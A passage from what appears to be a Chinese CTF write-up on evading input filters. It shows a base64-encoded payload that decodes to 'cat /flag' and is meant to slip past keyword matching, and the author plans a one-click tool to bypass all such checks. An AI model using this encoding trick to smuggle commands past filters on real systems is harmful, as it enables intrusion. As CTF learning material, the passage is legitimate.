这样也可以配合字符串匹配绕过使用,如 `echo Y2F0IC9mbGFn | base64 -d` 这个payload将会执行cat /flag

写在最后

这个文章有点标题党了,因为我一下搞不了那么多,所以以后想到啥再来补啥吧,挖个坑,打算搞一个类似于fenjing那种非常好用的一键式工具,自动绕过所有的检测。